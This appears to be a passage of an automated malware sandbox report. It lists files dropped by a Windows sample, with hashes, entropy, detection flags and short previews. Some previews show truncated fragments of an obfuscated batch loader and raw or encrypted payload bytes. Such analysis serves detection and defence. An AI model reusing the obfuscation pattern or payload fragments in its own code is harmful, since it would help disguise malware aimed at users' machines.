                                                                                                                                                                                                                                                                                  Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification
                                                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\245347\Dry.com
                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):49152
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.8180424350137764
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                                                                                                                                  MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                                                                                                                                  SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                                                                                                                                  SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                                                                                                                                  SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\245347\Dry.com
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1787
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.36170862061985
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:48:SfNaoCtTECifNaoCqPCqfNaoCBC5fNaoCklI0UrU0U8CkQ:6NnCtTECKNnCwCyNnCBCVNnCH0UrU0Ub
                                                                                                                                                                                                                                                                                  MD5:679996B81C50D92A2350C21D0435855A
                                                                                                                                                                                                                                                                                  SHA1:CC7AC60AE481C310EB0E14C571BE59D2580B0285
                                                                                                                                                                                                                                                                                  SHA-256:0F26A6EF3AA1D5905FFFC21618D68AE3CB9CC813A16E216F3E9B574AE7631BB6
                                                                                                                                                                                                                                                                                  SHA-512:A2A387C735ED2359205D9E8914C3E22912796A8A00ABD09A62E4A2A4CA79C497834612DAB5E15F1FAB803FB8864CD3F8A5B3187D04DA944724E17AD0103EF236
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/507FD03D7763A0807809AC4BFB737878",.. "id": "507FD03D7763A0807809AC4BFB737878",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/507FD03D7763A0807809AC4BFB737878"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/49120268499C74A909177616D9EEC705",.. "id": "49120268499C74A909177616D9EEC705",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/49120268499C74A909177616D9EEC705"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtoo
                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                                  Size (bytes):947288
                                                                                                                                                                                                                                                                                  Entropy (8bit):6.630612696399572
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                                                                                                                                                                                                                                                                  MD5:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                                                                                                                                  SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                                                                                                                                                                                                                                                                  SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                                                                                                                                                                                                                                                                  SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                   Joe Sandbox View:
                                                                                                                                                                                                                                                                                   • Filename: Wine.exe, Detection: malicious
                                                                                                                                                                                                                                                                                   • Filename: Setup.exe, Detection: malicious
                                                                                                                                                                                                                                                                                   • Filename: GoldenContinent.exe, Detection: malicious
                                                                                                                                                                                                                                                                                   • Filename: file.exe, Detection: malicious
                                                                                                                                                                                                                                                                                   • Filename: Full-Setup.exe, Detection: malicious
                                                                                                                                                                                                                                                                                   • Filename: Setup.exe, Detection: malicious
                                                                                                                                                                                                                                                                                   • Filename: Setup.exe, Detection: malicious
                                                                                                                                                                                                                                                                                   • Filename: Full-Setup.exe, Detection: malicious
                                                                                                                                                                                                                                                                                   • Filename: file.exe, Detection: malicious
                                                                                                                                                                                                                                                                                   • Filename: file.exe, Detection: malicious
                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):273971
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.999316760386263
                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                  SSDEEP:6144:U4AyLxh/qeIF4xk08pIehmr0jZlEy5Euq1d+0JO8vr2eUpWcZcV5TeU:UFyLLqH4e3bll5EBf+qOa2Pl45V
                                                                                                                                                                                                                                                                                  MD5:0C7D5F0DB7D1BE49FC2285C64D3C45AA
                                                                                                                                                                                                                                                                                  SHA1:942803613A17B0735F80D32DAB9BE6B87A0E472F
                                                                                                                                                                                                                                                                                  SHA-256:D49D834CB452343C64C7B9716F5B6D6032CE8B81E04995CCD1AF130FF863143D
                                                                                                                                                                                                                                                                                  SHA-512:52C3CACDD5A798243BDF191D0F673C63BEFD5297284E2841DE8EF0588B103B1192E60D50E22E5572FA160834BE7D052AA328556ED182A1CC56C9BE55AB76CCC8
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:Vz.5..Ff._);.S...jK.;.E......5...mv...%*.F.a..R-A..bv"g'5.3..b.e.$...[$D!..>..uT.j.....NY.K.p...ig.O@=..U_r.R......W.~/|......R.&.s...A-.y..d.....p...8T....$..b.k......gT...*..2.."f...0...T../..0,..#X.1.j...W.%)@\....3.B|........m.0...V7.HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....R}...N.8.'.F...h..............R.."...R.."..kC.R......%x....}...q..U-...(....%....V..?p.hf..........@.#....{'.l..v..*)~.K....dC`:.......c!.).A.&!0..~..}..h..w14.h.%.!4.A...V..+}.,{{.s.x..K....V.E...`.[..r..t. ..,P..Myn.2..t.W............<..R.......R.."..m.....8..r..5...x..2).U.j....R>..#.~.....b(..|......\.....k.LX....=.#=.....a.'....-??!?..H.`u.......f...g...I..Wz .......7.Pr..+.Q~..S.e.w..@...tj...)...=.6`)PP;v,8.lA_>y.m.......a....C.........c{...9,....=Ip....6..d.g...c8.XCloB.....U.M.|......od.8...|..0k.&Tc.
                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\9EI7wrGs4K.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):98304
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.998259787787389
                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                  SSDEEP:1536:k9iLtvCFjxENuqEuyf18I+F8tR2LiIXZYB+X6M4jw8oLynlk6iGTST/eeNhwCl:5tKtxE5Euyf1d+F8L2vXZYBO4Hc0r2TF
                                                                                                                                                                                                                                                                                  MD5:5535AA11BB8A32622DADB4CB7D45071C
                                                                                                                                                                                                                                                                                  SHA1:76B4B6221174F1B11370D7AA2A89A5996624C7F8
                                                                                                                                                                                                                                                                                  SHA-256:EAD59F9D65F7830E35A9C213B07938B7BC57513692ECBCF66B4BE4AC82350EBA
                                                                                                                                                                                                                                                                                  SHA-512:B14A53EA33B6F44EF4FFFB76060955F9AE85BFED79CA206359FFCDF80AA33D21ABFF41D526E43BA55BC33048FD8A237A2C854E92856F292CB4825304ACFBE3BD
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:..YcDf.5...^f......e>:......!...s.d..2.j...i.b..=.Y.z......0...H..j.oW2...rj.srN...7.V..0..?.hSW...wl.q....V..}`T.q.u[.NV5I....r.a"...FK'.@W.._..zh>.x..d..R....p..../.Nd.....f8.F.....2pI.hm......x*.;..:......../,.@?......2..~..I@.+j.S....X..ku..............t....Mq..+zB....HY..".B]....*..8...!C.)`.....AZ5p.....z.J..>..q..;...v.a.........._R.P...F..i.L....+.r|@>K.9..y...+..n....{...g...5.m.....59..c.Y!.0.n.'..M[....?.s#..h.N.......`.[.A......:.s..~..:g=..(NcI.......u/Z.C...I.A.^..Fw.D}....+..@.C78....F....t..c.c.,xUl.....b..j}.Hj4..~..&q=%~......9."dR..q..6,t....^._a6.xM.%...3...%.p.-..81.j(............H-....D..~:-.M...Cq. .t...9.6Rx...%_30...L..........6.x\D..@9`..)..\...P..z^p..I.V.M0.y......(.7.....k.....h.....+.j.&.8.....B)..b..O/r..7....%.M..J.C..".UDk.I.... 3...dT;.n...=m.0F.R.....r..wn....`...d.Tn.}........T.5.#........d<T....Y...i......bQ. .|\n5x...\Q...#y.K..._.(.{.!_...7{.TXzJ....x|...XF<L..@H.....g.-...<..."M.....1.........Aj.
                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\9EI7wrGs4K.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (798), with CRLF line terminators
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):17809
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.131067698498597
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:384:epq5NAPPiFt6JXCvH2/gFl3eF2OEgV9Qqnx:epfPPCt6JXgjlmck/x
                                                                                                                                                                                                                                                                                  MD5:15687A16A1310BB6DFCB1FB9B8D052B3
                                                                                                                                                                                                                                                                                  SHA1:BDA139691A5C3F90F7059D84DBAD98354748832F
                                                                                                                                                                                                                                                                                  SHA-256:08F36DA3D5E25C26D14E49BC46995AA1A5842AD368A9E02244DB850F77D4A70F
                                                                                                                                                                                                                                                                                  SHA-512:9DFAFA0CF6E7A54037CC53C155C7214580A90B4066D3B469A966F53D363AE63A6A4D9BB08A8DE64796E8C6B36E6A5E8374069952628A81B13EBFE93ABBC51574
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:Set Deviant=I..XbxCooling-Monthly-Records-Furnishings-Consolidation-Represents-Tribal-Bumper-Pill-..DJiTransexuales-Supported-Jonathan-Deadly-Rel-Mistress-Later-Scientists-Salary-..anLanguage-French-Kansas-Tuner-Drunk-..DcRespect-Morning-Words-..nZAcquired-Schools-Mere-Harley-Penalties-Spider-Profile-..LKQxSent-Permission-Ag-Rapids-..cNRatios-Emotions-..DDGTim-Describe-..Set Favour=S..paDollars-Bull-Ghana-Background-Researcher-Accreditation-Norway-..zhTexas-Allowing-Uzbekistan-Toolbox-Nv-Asus-Plots-Golf-..kUHelmet-Broker-Warcraft-Accurately-Ol-Competing-Ugly-..aWRoutes-U-Exploring-Diff-Airfare-Budget-Defense-..iPCArtwork-Proven-Film-Features-Wit-Lets-..Set Speaks=y..ZeMattress-Drug-..aiHChallenging-Bank-Hospitality-Mystery-Tony-Affair-Elementary-..WPSFrank-Opinion-Eugene-Puzzles-Future-..uLCorn-Metadata-Sheriff-Austria-Division-Second-After-Finite-South-..FmLatino-Launches-Kidney-Hazard-Congressional-..naZnImplementation-Presents-Lowest-..Set Centered=X..ffPContained-..vChSuit-Graduate
                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (798), with CRLF line terminators
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):17809
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.131067698498597
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:384:epq5NAPPiFt6JXCvH2/gFl3eF2OEgV9Qqnx:epfPPCt6JXgjlmck/x
                                                                                                                                                                                                                                                                                  MD5:15687A16A1310BB6DFCB1FB9B8D052B3
                                                                                                                                                                                                                                                                                  SHA1:BDA139691A5C3F90F7059D84DBAD98354748832F
                                                                                                                                                                                                                                                                                  SHA-256:08F36DA3D5E25C26D14E49BC46995AA1A5842AD368A9E02244DB850F77D4A70F
                                                                                                                                                                                                                                                                                  SHA-512:9DFAFA0CF6E7A54037CC53C155C7214580A90B4066D3B469A966F53D363AE63A6A4D9BB08A8DE64796E8C6B36E6A5E8374069952628A81B13EBFE93ABBC51574
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:Set Deviant=I..XbxCooling-Monthly-Records-Furnishings-Consolidation-Represents-Tribal-Bumper-Pill-..DJiTransexuales-Supported-Jonathan-Deadly-Rel-Mistress-Later-Scientists-Salary-..anLanguage-French-Kansas-Tuner-Drunk-..DcRespect-Morning-Words-..nZAcquired-Schools-Mere-Harley-Penalties-Spider-Profile-..LKQxSent-Permission-Ag-Rapids-..cNRatios-Emotions-..DDGTim-Describe-..Set Favour=S..paDollars-Bull-Ghana-Background-Researcher-Accreditation-Norway-..zhTexas-Allowing-Uzbekistan-Toolbox-Nv-Asus-Plots-Golf-..kUHelmet-Broker-Warcraft-Accurately-Ol-Competing-Ugly-..aWRoutes-U-Exploring-Diff-Airfare-Budget-Defense-..iPCArtwork-Proven-Film-Features-Wit-Lets-..Set Speaks=y..ZeMattress-Drug-..aiHChallenging-Bank-Hospitality-Mystery-Tony-Affair-Elementary-..WPSFrank-Opinion-Eugene-Puzzles-Future-..uLCorn-Metadata-Sheriff-Austria-Division-Second-After-Finite-South-..FmLatino-Launches-Kidney-Hazard-Congressional-..naZnImplementation-Presents-Lowest-..Set Centered=X..ffPContained-..vChSuit-Graduate
                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\9EI7wrGs4K.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):105472
                                                                                                                                                                                                                                                                                  Entropy (8bit):6.627402952919146
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3072:H80PtCZEMnVIPPBxT/sZydTmRxlHS3NxrHSB9:cSCOMVIPPL/sZ7HS3zw
                                                                                                                                                                                                                                                                                  MD5:8496CEF888EE804F2B8A44171481E40A
                                                                                                                                                                                                                                                                                  SHA1:90FCDE8C353D79AE02BFC946D708D35FEDFEA64F
                                                                                                                                                                                                                                                                                  SHA-256:0D8671285841832D972CA2576CDB83F412AF8433CF33C511F652912E7FD7E29B
                                                                                                                                                                                                                                                                                  SHA-512:158C70A8804E73DFB25A1265328FADC26903C5B035A991AAA570F0EF98F89D616C635E4820E926FB8E00E1C20CFCF3FD441DCC0CA5EEFA109DD5BC23E0E4C61D
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:.....8.u..N...9..j.Pj(.6.~..=..I..E...E........u.............h.....u...^.b...PQWj..............}.....................f.}.....u..u.Wt.j..0j............t%j..7..\.I....u..u.W.....t.j...j......E.f.M............}.........u.f....u.Wt.j...j..S....E......w..QH..3.@......E.PV..4.I..E.P....I..E.PV..x.I..E.;E.......;E........E.;E.......;E.~............;...................u....{...j.j.SPW.....N........P.......Pj.j.W....I.SW.%....V...<..........E......j.VWS....I..E.QQ...E..]..E..\$....E..]..E...$.0VWS....I.VWS....I.S....I..U..M.E..j.X.E....E..E....*....E.j.X.u..E....E....E.S.U..M......u.j..u..u.S......M....P.E.....PVWS....I......E.j.X.u..E....E....E.S.U..M..4....u.j..u..u.S.....M....P.E........M.A...+.P.A...+.PVWS....I..<...t+H...t..u......c....}..^.......P....E...G....u.VWS....I..U..M..0....E.9..)M...1...95.)M........ ...P....I..%.)M.......V....I...S............xH.......V.u.h8....]...t..T)M...................V.u.h4....6...t(.T)M............<...h...<...`.......X...V.u.h3....u...x.I
                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\9EI7wrGs4K.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):116736
                                                                                                                                                                                                                                                                                  Entropy (8bit):6.265669967004004
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3072:t/Dde6u640ewy4Za9coRC2jfTq8QLeAg0Fuz08XvBNbX:t/Dd314V14ZgP0JaAOz04pd
                                                                                                                                                                                                                                                                                  MD5:37F28BCCBCAEA4719409C72AA6385586
                                                                                                                                                                                                                                                                                  SHA1:083AD006B92745C976989BC5FB76E7187D81A597
                                                                                                                                                                                                                                                                                  SHA-256:7101D14A5FCF7B47A9C6B809155BEA70121C61D2DF7E2244573204C2190CCF45
                                                                                                                                                                                                                                                                                  SHA-512:105DE3A0358C0E95B573DD1FC590B27C33F8033158B28A523A5EF9BDBFAA1F488E6B0F7556D6E46D96E23F00392F4EEBDED0DCEA31926A05823EA1B5D4FFF22F
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:.L.R.u..;...}......u.2..9.E.f9.t..5H.I.PShC...Q..SShN....7..9..(M.u......f........_^[].(.U..Q.}..SVWu<.}..u...................I..............F.........u{2._^[.....E.P.E.P.u......t.M..@)M..}.......T)M............<.t.<.t.<.t.<.t..y..u.....I..u..F........T)M.......F..A..~..t..........y...U..E(...SV...W;.u.j.X.....P.^M...U,......;.u...E ;.u.......M$;.u.j.Yj.Q.u.QP.u..u.Sj.h`.L.R.u...:...u.....u.2..@.M..U...........j.P...YY.E.Pj.h.....6..H.I..=.(M..u.f........_^[..(.U..E(...u....0.SV.....t...........P.L.....E,...u.......M ...u.......U$...u......3.CSQ.u.RQ.u..u.V.u.hT.I.P.u..:9...u.....u.2..(P..l.I.PPh.....6..H.I..=.(M..u.f........^[].(.U..E(@..S..#E(V.....P..K...M,...U A....#M,...u.......E$...u......3.CSQ.u.PR.u..u.V.u.h,.L.Q.u..8...u.....u.2...j.....I..FL.=.(M..u.f........^[].(.U..E(SVW...u...........P.dK...M,.] A....#M,...u.j [.}$...u.j _3.RQ.u.RR.u..u.PRh..I.Q.u...8...u.....tTf......3.}.f......3.Cf9.tt.E....f........E.f.......E0P.Q......WV..L......u.Q..<.I.2.M0...._^
                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\9EI7wrGs4K.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):128000
                                                                                                                                                                                                                                                                                  Entropy (8bit):6.334318948869726
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3072:UZg5PXPeiR6MKkjGWoUlJUPdgQa8Bp/LxyA3laW2UDQWfu:UK5vPeDkjGgQaE/loUDtfu
                                                                                                                                                                                                                                                                                  MD5:3B84985152CD93F2BD04BD909D7C902E
                                                                                                                                                                                                                                                                                  SHA1:4BD3D6AF1E4ED7EFE357E707EC7E6AB2E3FF4EEE
                                                                                                                                                                                                                                                                                  SHA-256:9DF8E69068B9CE01749FE0A515DB1554C05D491C3A5A4F80F8ABA060EA89950F
                                                                                                                                                                                                                                                                                  SHA-512:051D3B9FA3D463D78D1AC971396DCB00D930A9E9C3F7A1278A7DD8027D1AB159F688F912D65D78ADA9F059D73526F987A36CAC0D5100CAE5491959DD059F89DD
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B.........................................................................................................................................................................................................................................................................................................t.M.....hi'D......Y.hs'D......Y..r...hx'D......Y..|X..h}'D......Y.Q.I...h.'D.....Y.0$M.Q.@..0$M.P.=B..h.'D.....Y...C..h.'D.....Y.....h.'D..}...Y..+O..h.'D..l...Y..!...h.'D..[...Y.45M....h.'D..E...Y
                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\9EI7wrGs4K.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):90112
                                                                                                                                                                                                                                                                                  Entropy (8bit):6.669251844476311
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:1536:zzGc/xv5mjKu2IwNnPEBiqXv+G/UXT6TvY464qvI932eOypvcLSDOSpZ+q:v5mjccBiqXvpgF4qv+32eOyKODOSpQq
                                                                                                                                                                                                                                                                                  MD5:3EFE58B3BE584C2AFE3D64A453F70DAC
                                                                                                                                                                                                                                                                                  SHA1:BA151BDFA43145DC0E3A495AC5382638CFB0A2C1
                                                                                                                                                                                                                                                                                  SHA-256:7054A53CE5187D3470517170AF3138DC28CEC4ED1793574A91CCA795FB7E3E10
                                                                                                                                                                                                                                                                                  SHA-512:929B0A9AF43360AF0F820FAB936650B211978523B9FDEF00EE563930E03F2A9830E5C2246BE9ACE7F95AB78CFB075E82347CAFB02472B8A09DC4859C9A5232F3
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:..0.]..B....t...........B.......It.........U.R.Na....RP.U..B ...t....u...$XZ.]..]...U...u..A...Y].U.....u...P..Y..t..u......Y..t.].}....h....F...U..]...........`K..U....L....j Y+.E...3...L.].U..E.V.H<....A..Q.....A.k.(..;.t..M.;J.r..B..B.;.r...(;.u.3.^]....V......t d........M..P...;.t.3.........u.2.^..^.U..}..u.....M.........-....u.2.]..?$....u.j...-..Y...].U.....=..M..t.....V.u...t....u}.$.....t&..u"h..M.."..Y..u.h..M.."..Y..tF2..K...L..u.W......M.j Y+.....3...L..E.E..E.......M..E.E..u.E...._....M....^..j......j.h..L......e...MZ..f9...@.u].<.@.....@.PE..uL.....f9...@.u>.E....@.+.PQ.^...YY..t'.x$.|!.E..........E..3.8..........e..E.....2..M.d......Y_^[..U.........t..}..u.3....M...].U..=..M..t..}..u..u..."...u..[,..YY..].U....L...3...M.....u.....u...!....h..M..l!..Y..Y....#E.].U...u.......Y....H].U...u..Q...Y].."...j......Y..t.hL.B......Y3..j..S....U..j.h3'D.d.....PSVW...L.3.P.E.d.....h....h..M...8.I.h..J.....I.....u.h,.J.....I...........hH.J.V....I.hd.J.V.....
                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\9EI7wrGs4K.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):71680
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.997482190075013
                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                  SSDEEP:1536:UzkS9wznOULQYQQ1YvdhCPF6+XoWW/ej/q57UJZNt+59uxkfQFaxT7k:UzkS9wzNLQYhNvlW/ej/q5oJR69uxk0Z
                                                                                                                                                                                                                                                                                  MD5:F5C4EA189E763C79767BB2F4BC471F08
                                                                                                                                                                                                                                                                                  SHA1:6ABE10F27AEB64CB3583EC3549D8F84EB23B05EB
                                                                                                                                                                                                                                                                                  SHA-256:49B1A81A6965071DB23FE804A6293B87FD2AB96CFDA6E28D806C1E76A53E723E
                                                                                                                                                                                                                                                                                  SHA-512:31E79F7A7FC0A5EEA3C4D70B152F75573C43C324B317667F41A824EBB2913D7BF4BACBF08A85D6281EC33ADA2F2BABE2A26D251008288CB6A4CE85E38DBE51D7
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:Vz.5..Ff._);.S...jK.;.E......5...mv...%*.F.a..R-A..bv"g'5.3..b.e.$...[$D!..>..uT.j.....NY.K.p...ig.O@=..U_r.R......W.~/|......R.&.s...A-.y..d.....p...8T....$..b.k......gT...*..2.."f...0...T../..0,..#X.1.j...W.%)@\....3.B|........m.0...V7.HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....R}...N.8.'.F...h..............R.."...R.."..kC.R......%x....}...q..U-...(....%....V..?p.hf..........@.#....{'.l..v..*)~.K....dC`:.......c!.).A.&!0..~..}..h..w14.h.%.!4.A...V..+}.,{{.s.x..K....V.E...`.[..r..t. ..,P..Myn.2..t.W............<..R.......R.."..m.....8..r..5...x..2).U.j....R>..#.~.....b(..|......\.....k.LX....=.#=.....a.'....-??!?..H.`u.......f...g...I..Wz .......7.Pr..+.Q~..S.e.w..@...tj...)...=.6`)PP;v,8.lA_>y.m.......a....C.........c{...9,....=Ip....6..d.g...c8.XCloB.....U.M.|......od.8...|..0k.&Tc.
                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\9EI7wrGs4K.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):239
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.917953550006691
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6:ox3FqjvVg3F+X32+hZCt7HSbYwClS6CSNN:63FyGSG+fCtJfjN
                                                                                                                                                                                                                                                                                  MD5:28A97FEBFC5CD391BEC1E2A3D9D938BF
                                                                                                                                                                                                                                                                                  SHA1:ADEA302B1D73D65C4C2A64F4F10955D5E4D728AA
                                                                                                                                                                                                                                                                                  SHA-256:2528CD8D1353E6C4DBCC6D2226B5B50EF14027A962A49C4001D2C8C072904773
                                                                                                                                                                                                                                                                                  SHA-512:7BBB7F7781C77740EFC6361C5195A01F854C3CA1AFD9EC7870C4F87C5A28432AF97D61A41E4AF0D2D3CEA45FA3565E297FC08CD7ACA91831792DF0A81EFE0F82
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:profiles........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...
                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\9EI7wrGs4K.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
